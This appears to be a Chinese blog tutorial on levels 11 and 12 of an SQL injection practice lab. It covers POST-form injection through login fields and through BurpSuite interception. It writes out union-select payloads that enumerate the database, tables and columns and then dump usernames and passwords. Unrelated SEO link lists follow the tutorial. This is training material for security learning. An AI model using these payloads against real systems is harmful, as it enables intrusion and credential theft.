当前位置: 首页 > wzjs >正文

揭阳中小企业网站制作4a广告公司

wzjs 2025/8/28 8:09:51
揭阳中小企业网站制作,4a广告公司,常州百度网站排名优化,怎么给网站做aap目录 【sql靶场】第11、12关-post提交注入 POST 一、URL 二、核心组成部分 三、数据编码规范 四、应用场景与请求方法 第十一关 方法一 步骤一 步骤二 步骤三 步骤四 步骤五 步骤六 步骤七 方法二 步骤一 步骤二 步骤三 步骤四 步骤五 步骤六 步骤七 第…

目录

【sql靶场】第11、12关-post提交注入

POST

一、URL

二、核心组成部分

三、数据编码规范

四、应用场景与请求方法

第十一关

方法一

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

方法二

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

第十二关

【sql靶场】第11、12关-post提交注入

POST

关卡讲解前小知识,不看可以跳过

一、URL

URL(Uniform Resource Locator)是互联网上唯一标识资源位置的字符串,包含协议、主机地址、路径等核心部分,用于定位和访问网络资源‌12。其标准格式为: 协议://主机地址[:端口号]/路径?查询参数#锚点 https://www.example.com:8080/api/users?id=123#section1

二、核心组成部分

‌协议(Scheme)‌,定义资源访问的通信协议,例如:

http:超文本传输协议(明文传输)‌ https:加密的HTTP协议(安全性更高)‌ ftp:文件传输协议

主机地址(Host)

域名:如 www.example.com IP地址:如 202.108.22.5

端口号:可选,默认HTTP为80,HTTPS为443,自定义端口需显式指定(如:8080)‌

‌路径(Path): 表示服务器上的资源路径,如 /api/users/img/logo.png‌12。

‌查询参数(Query Parameters):以 ? 开头,key=value 形式通过 & 分隔,用于向服务器传递附加参数,如 ?name=John&age=30。

‌锚点(Fragment)以 # 开头,用于页面内导航(如 #section1),仅客户端使用,不发送至服务器‌。

三、数据编码规范

URL中非ASCII字符(如中文、空格)需进行‌URL编码

规则如下:将字符转换为十六进制值,前缀加 %(如空格 → %20/%2F)‌,编码方式由浏览器或编程语言决定,可通过 encodeURIComponent() 等函数统一处理‌。

示例*: https://example.com/search?q=%E4%B8%AD%E6%96%87(搜索“中文”)

四、应用场景与请求方法

GET请求

数据通过URL参数传递,明文暴露于地址栏,适用于非敏感数据(如搜索关键词)‌。

受URL长度限制(通常≤2048字符)‌。

POST请求

数据通过请求体传输,URL中仅包含资源路径(如 https://example.com/login)‌。

适合提交敏感信息(如密码)或大量数据(如文件上传)‌

第十一关

这一关提交方式从get变成了post,使得数据不会通过URL参数传递,明文暴露于地址栏,所以使用post提交POST请求的数据存储在‌请求体(Body)‌中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入

学习阶段尝试注入方法有

方法一:直接在页面的账号密码输入框里面进行注入

方法二:使用BurpSuite进行拦截注入

方法一
步骤一

在账号或者密码输入框中进行测试单引号闭合

1'

发现账号密码的输入框都可以进行注入

步骤二

进行测试列数

1' order by 5 #


1' order by 3 #


1' order by 2 #

4-测试列数3

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

1' union select 1,database() #

步骤五

注入表名

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

步骤六

注入字段名

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#

步骤七

注入账号密码

1' union select  1,(select group_concat(concat_ws(0x3a,username,password)) from users)#

方法二
步骤一

打开BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开关卡页面,随便输入账号密码,点击提交

步骤二

进行测试列数

1' order by 5 #


1' order by 3 #


1' order by 2 #

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

1' union select 1,database() #

步骤五

注入表名

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

15-注入表名

步骤六

注入字段名

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#

步骤七

注入账号密码

1' union select  1,group_concat(concat_ws(0x3a,username,password)) from users#

17-注入账号密码

方法一与方法二差不多,看个人喜欢,而且单单从sql靶场这几个关卡来看,post提交这里的sql关卡和前面的get提交差不多,只是将从地址栏注入变成了输入框或者拦截注入

其实还有一个方式可以注入,就是利用软件工具等等进行漏洞扫描注入

第十二关

与第十一关基本一样,只是闭合方式变成了"

http://www.dtcms.com/wzjs/517111.html

相关文章:

  • 武汉互联网网站建设公司企业线上培训平台
  • 海搜网做的网站怎么样各种手艺培训班
  • 东莞疫情情况 最新消息衡阳seo优化
  • wordpress怎么开放注册seo到底是什么
  • 网页的网站导航怎么做荆州seo推广
  • 本机网站建设河南品牌网站建设
  • 海拉尔做网站多少钱太原竞价托管公司推荐
  • 我要用新浪云做网站谷歌seo服务
  • 移动网站怎么做服务器租用
  • 网站开发有几种语言搜索引擎营销方案例子
  • 网站建设比较好郑州网站建设价格
  • 网站建设开发背景抚顺优化seo
  • 域名停靠性seo首页排名优化
  • 阿里巴巴国际站客服电话武汉seo招聘网
  • 域名网站怎么打开营销策划公司的经营范围
  • 做招聘网站需要什么人员营销型网站和普通网站
  • 10类地方网站 总有适合你做的楚雄今日头条新闻
  • 济南营销型网站建设seo外链专员
  • 手机网站建设的价格网店代运营靠谱吗
  • 在线做图的网站沈阳网络关键词排名
  • 建设部信息中心网站百度引擎搜索
  • 甘肃商城网站建设行者seo
  • 哪个网站可以做平面兼职软文广告发布平台
  • 做教育培训网站需要资质么游戏推广员是做什么的
  • 男生跟男生做口视频网站seo外包公司兴田德润官方地址
  • 如何优化网站速度微商软文大全
  • 网站左侧浮动代码优化教程
  • 凡科网站为什么免费做网站北京网站托管
  • 万达做的电商网站百度推广价格价目表
  • 建设个人网站用到的技术口碑营销案例分析